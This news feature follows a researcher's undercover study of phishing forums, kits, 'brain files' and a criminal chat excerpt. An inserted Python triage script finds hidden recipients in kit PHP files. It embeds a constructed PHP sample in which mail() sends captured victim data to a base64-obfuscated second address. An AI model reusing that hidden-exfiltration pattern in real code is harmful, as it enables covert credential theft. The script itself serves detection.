Going undercover in the slimy world of phishing

Jason Harbert was a terrible spammer.

The research scientist for Cloudmark recently spent weeks monitoring the phishing community’s chat rooms and forums, learned the lingo, earned some trust, and even received kits from the fraudsters who set up scam pages that steal victims’ personal data. Then he went and hurt the criminals’ feelings after not coming through on the spam delivery.

But he did come out of the experience with extensive data and insight on every aspect of the underground marketplace: how the attacks are orchestrated, how phishing kits work and are structured, the so-called “brain files” they share, and even new pyramid schemes linked to the spread of the kits.

After weeks of undercover research into the phishing community, Cloudmark contends that the availability of these automated phishing kits, costing $10 or $20, has made it a breeze for novices to start up operations and has caused a sharp rise in phishing attacks.

Hacker toolkits are nothing new. Recent news reports have even pointed to certified ethical hacking toolkits for sale on eBay, which contained similar items still for sale as of Sept. 21.

Security vendor Tier-3, headquartered in Sydney, rejects the suggestion that these openly advertised sales are above-board simply because they are tied to ethical hacking certification, saying that the kits contain surreptitious Trojan loaders and Web site hacking utilities that can be used for criminal black-hat hacking.


“It basically puts high-level hacking tools … into the hands of almost any Internet user— including novices— providing they have an eBay and PayPal account,” said Tier-3 CTO Geoff Sweeney in a statement.

How to Talk Like a Phisher

Sweeney said that where previously would-be hackers “had to score ‘brownie points’ to gain access to the hacker forums and source the kits”—as did Harbert— the fact that they are now on open sale on eBay is “very worrying.”

Although he hasn’t looked at the eBay kits, Harbert said that if what Sweeney claims is true, the ethical kits are likely being used to commit cyber-crimes. “Most ethical hacking courses focus [on] techniques, rather than hacking kits, per se,” Harbert said. “But, there may be ethical hacking kits that I’m not aware of. If there are, it is almost certain that they would be leaked to the black-hat hackers and used for fraudulent activities.”

The number of phishing reports hit an all-time high of 55,000 in April, according to a trend report put out at the time by the Anti-Phishing Working Group.

The rise in phishing attacks, Cloudmark says, is due both to the profits involved and the ease of carrying them out. Phishing kits—aka “scam pages” in the phishing community—are a collection of files to create a comprehensive phishing site.

The individual components work to automatically collect, store and send a victim’s personal information back to the phisher. They’re widely available, the company says, and typically cost $10 to $20, often sold in a group with multiple kits targeted to specific financial institutions or organizations, such as Bank of America or eBay.

Harbert described the phishing community as being made up of specific roles and jobs. The role of a spammer, for example, is to create and send e-mail messages with a link to the phishing site.

Spammers often use botnets to send messages in bulk in a short period of time. Using botnets means spammers can hit the inboxes of a large number of people before anti-spam products identify the message and begin to filter for it.

Another role in the community is that of the casher. These community members advertise their services in cashing out compromised bank accounts, such as Wells Fargo accounts.

Cloudmark published a whitepaper on the undercover work in which the company quoted this sample discussion from a phishing channel:

14:29 <Droper> cashout any us bank like Wachovia, Wells, Chase, Citibank, Boa, Wamu and all uk banks and some Canada Banks also Pick WU and MG and drops for merchandise and drop for Billpay msg me for deal

14:31 <jiciuvyu> i have e-gold, root, paypal, poste.it, php mailer, php sender inbox, scam pages, ebay extractor, mail extractor, bank logins, and need wells drop prv me

The user with the handle “Droper” is a casher advertising the banks he or she can extract currency from. The other user, “jiciuvyu,” is advertising phishing tools and information available and also is requesting a “wells drop,” meaning a Wells Fargo bank account to transfer—or to “drop”—money into.

After talking the talk for a few weeks, Harbert convinced users to send tools and phishing kits. He found within the kits HTML files, PHP files and a variety of Web files.

Would-be phishers unzip a kit and run it. When deployed on a server, the kit creates an automatic phishing attack. The phisher inserts his or her e-mail address into the configuration file so that when a victim falls for the attack, his or her information is automatically forwarded to the phisher.

What surprised Harbert, he said, was to find that the variety of kits all shared a common set of back-end files—what he calls the “brain files,” with the same names.

Phishing monitoring companies are seeing an explosion of these kits—not surprising, given that they’re “simple, easy and cheap” to run, Harbert said.

Looking deeper, he discovered that novice phishers are actually being scammed by advanced phishers. Those advanced phishers are writing and selling kits that include secret, obfuscated code that e-mails stolen information not only back to the primary phisher but to the original phisher who sold him or her the kit.
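As an added example (not Cloudmark’s tooling and not code from any kit Harbert received), here is a small Python triage script an analyst could run over a kit’s back-end PHP files to surface both the buyer’s configured address and a base64-hidden second recipient of the kind described above. The sample file, the regular expressions and the function names are constructed for the illustration.

```python
import base64
import re
from typing import Dict, List, Set

# Constructed sample standing in for one back-end PHP file of a kit. It
# mimics the pattern described above: a configuration address set by the
# kit's buyer, plus a second recipient hidden behind base64 by the seller.
SAMPLE_KIT_FILE = r'''<?php
// edited by the buyer before deployment
$to = "buyer-address@example.invalid";
// planted by the seller; invisible to a casual grep for "@"
$x = base64_decode("YXV0aG9yLWFkZHJlc3NAZXhhbXBsZS5pbnZhbGlk");
mail($to, "Result", $msg);
mail($x, "Result", $msg);
'''

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
B64_RE = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")


def decode_b64_literals(src: str) -> List[str]:
    """Decode every base64_decode("...") literal that yields valid UTF-8 text."""
    decoded = []
    for blob in B64_RE.findall(src):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # binary or malformed payload; leave it for manual review
    return decoded


def count_mail_calls(src: str) -> int:
    """Number of PHP mail() calls; more than one is the first hint of a second recipient."""
    return len(re.findall(r"\bmail\s*\(", src))


def find_exfil_addresses(src: str) -> Dict[str, Set[str]]:
    """Separate addresses visible in the source from those only recovered by decoding."""
    visible = set(EMAIL_RE.findall(src))
    hidden: Set[str] = set()
    for text in decode_b64_literals(src):
        hidden.update(a for a in EMAIL_RE.findall(text) if a not in visible)
    return {"visible": visible, "hidden": hidden}


if __name__ == "__main__":
    found = find_exfil_addresses(SAMPLE_KIT_FILE)
    print("mail() calls:", count_mail_calls(SAMPLE_KIT_FILE))
    print("visible recipients:", sorted(found["visible"]))
    print("hidden recipients:", sorted(found["hidden"]))
```

Run it over every PHP file in an unpacked kit; any address that appears only in the “hidden” set is one the buyer never configured and is worth reporting alongside the kit.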

Harbert also discovered what he says is a new phishing variant: the storage of stolen information in flat text files. Besides e-mailing the information to phishers, the kits also write all captured data to text files in the directory of a given attack. Harbert found that those text files have common names, and those names are visible on sites that report real-time phishing attacks, Cloudmark’s among them.

After writing a script to automatically retrieve the text files from such sites, Harbert found PayPal account details sitting in those flat text files—that is, PayPal accounts in plain, unencrypted text. He thus obtained 15,000 PayPal accounts, including user names and passwords, using no phishing techniques whatsoever—just a simple automated search on publicly available feeds.

Harbert also discovered a new trend within the community: unique attacks for every victim. Kits that create a unique scam URL for each target are highly desirable to phishers, because taking down any one URL no longer stops the attack.

Another role in the community is that of the rip-off artist who steals from the phishers. Called a “ripper,” such an individual promises to cash out a compromised account but instead just takes off with the money.

Armed with such terms, Harbert said it was easy to infiltrate the community. “Just go in and talk the talk, say you’re interested, that you want to make a lot of money, that you want to help them with attacks,” he said. “I pretended to be a spammer. … A lot of phishers sent a kit, and I didn’t do the work, and they were really kind of heartbroken. One guy told me I really hurt his feelings.”

By Lisa Vaas